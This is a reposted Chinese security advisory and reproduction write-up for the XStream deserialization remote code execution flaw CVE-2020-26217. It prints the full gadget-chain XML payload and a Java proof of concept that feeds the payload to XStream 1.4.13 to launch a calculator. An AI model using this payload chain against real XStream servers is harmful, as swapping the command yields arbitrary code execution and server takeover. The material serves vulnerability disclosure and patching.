XStream 远程代码执行高危漏洞(CVE-2020-26217)

admin 2020年11月16日20:52:32评论85 views字数 3319阅读11分3秒阅读模式
漏洞描述

XStream是一个常用的Java对象和XML相互转换的工具。2020年11月16日,XStream官方发布安全更新,修复了 XStream远程代码执行漏洞( CVE-2020-26217)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成远程代码执行,控制服务器。


CVE编号

CVE-2020-26217


CVSS评分/漏洞等级

8.5/高危


影响版本

XStream < 1.4.14


漏洞POC

官网已经公布POC,参考地址:http://x-stream.github.io/CVE-2020-26217.html

<map>  <entry>    <jdk.nashorn.internal.objects.NativeString>      <flags>0</flags>      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>        <dataHandler>          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>            <contentType>text/plain</contentType>            <is class='java.io.SequenceInputStream'>              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>                <iterator class='javax.imageio.spi.FilterIterator'>                  <iter class='java.util.ArrayList$Itr'>                    <cursor>0</cursor>                    <lastRet>-1</lastRet>                    <expectedModCount>1</expectedModCount>                    <outer-class>                      <java.lang.ProcessBuilder>                        <command>                          <string>calc</string>                        </command>                      </java.lang.ProcessBuilder>                    </outer-class>                  </iter>                  <filter class='javax.imageio.ImageIO$ContainsFilter'>                    <method>                      <class>java.lang.ProcessBuilder</class>                      <name>start</name>                      <parameter-types/>                    </method>                    <name>start</name>                  </filter>                  <next/>                </iterator>                <type>KEYS</type>              </e>              <in class='java.io.ByteArrayInputStream'>                <buf></buf>                <pos>0</pos>                <mark>0</mark>                <count>0</count>              </in>            </is>            <consumed>false</consumed>          </dataSource>          <transferFlavors/>        </dataHandler>        <dataLen>0</dataLen>      </value>    </jdk.nashorn.internal.objects.NativeString>    <string>test</string>  </entry></map>
漏洞复现
  1. IDE使用maven创建项目,在pom.xml中添加如下依赖:

<dependency>  <groupId>com.thoughtworks.xstream</groupId>  <artifactId>xstream</artifactId>  <version>1.4.13</version></dependency>

然后重载项目会自动下载安装对应版本的xstream

  1. 创建如下poc代码:

import com.thoughtworks.xstream.XStream;import java.io.IOException;
public class CVE_2020_26217{ public static void main(String[] args) throws IOException{ XStream xStream = new XStream(); String payload = "<map>n" + " <entry>n" + " <jdk.nashorn.internal.objects.NativeString>n" + " <flags>0</flags>n" + " <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>n" + " <dataHandler>n" + " <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>n" + " <contentType>text/plain</contentType>n" + " <is class='java.io.SequenceInputStream'>n" + " <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>n" + " <iterator class='javax.imageio.spi.FilterIterator'>n" + " <iter class='java.util.ArrayList$Itr'>n" + " <cursor>0</cursor>n" + " <lastRet>-1</lastRet>n" + " <expectedModCount>1</expectedModCount>n" + " <outer-class>n" + " <java.lang.ProcessBuilder>n" + " <command>n" + " <string>open</string>n" + " <string>-a</string>n" + " <string>Calculator</string>n" + " </command>n" + " </java.lang.ProcessBuilder>n" + " </outer-class>n" + " </iter>n" + " <filter class='javax.imageio.ImageIO$ContainsFilter'>n" + " <method>n" + " <class>java.lang.ProcessBuilder</class>n" + " <name>start</name>n" + " <parameter-types/>n" + " </method>n" + " <name>start</name>n" + " </filter>n" + " <next/>n" + " </iterator>n" + " <type>KEYS</type>n" + " </e>n" + " <in class='java.io.ByteArrayInputStream'>n" + " <buf></buf>n" + " <pos>0</pos>n" + " <mark>0</mark>n" + " <count>0</count>n" + " </in>n" + " </is>n" + " <consumed>false</consumed>n" + " </dataSource>n" + " <transferFlavors/>n" + " </dataHandler>n" + " <dataLen>0</dataLen>n" + " </value>n" + " </jdk.nashorn.internal.objects.NativeString>n" + " <string>test</string>n" + " </entry>n" + "</map>n"; xStream.fromXML(payload); }
}

编译运行

XStream 远程代码执行高危漏洞(CVE-2020-26217)







本文始发于微信公众号(锋刃科技):XStream 远程代码执行高危漏洞(CVE-2020-26217)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月16日20:52:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XStream 远程代码执行高危漏洞(CVE-2020-26217)https://cn-sec.com/archives/186168.html

发表评论

匿名网友 填写信息